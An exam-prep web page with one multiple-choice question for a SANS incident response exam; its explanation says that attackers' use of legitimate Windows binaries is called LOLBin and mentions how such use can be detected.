Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Unlock all questions

This demo includes only 20 questions. Upgrade to access hundreds of questions, flashcards, exam simulations, and disable ads.

Full question bankExam simulationsFlashcards

From $9.99Unlock all

Prepare for the SANS Advanced Incident Response exam. Boost your skills with flashcards and multiple-choice questions, featuring hints and explanations. Ace your exam faster!

Multiple Choice

Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Using legitimate Windows binaries to perform malicious actions is described by the term LOLBin. Attackers repurpose trusted system executables—like cmd.exe, powershell.exe, mshta.exe, regsvr32.exe, certutil.exe, and others—to carry out tasks such as downloading payloads, executing commands, or exfiltrating data. Because these tools are legitimate parts of the OS, they can blend in with normal activity, making detection harder unless security monitoring focuses on unusual usage patterns, atypical arguments, or suspicious parent-child process relationships. The expanded form, Living off the Land Binaries, conveys the same idea, but the shorthand LOLBin is the commonly used label for this tactic.

Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Prepare for the SANS Advanced Incident Response exam. Boost your skills with flashcards and multiple-choice questions, featuring hints and explanations. Ace your exam faster!

Which term is used to describe the tactic of using legitimate Windows binaries for malicious purposes?

Get the latest from Examzify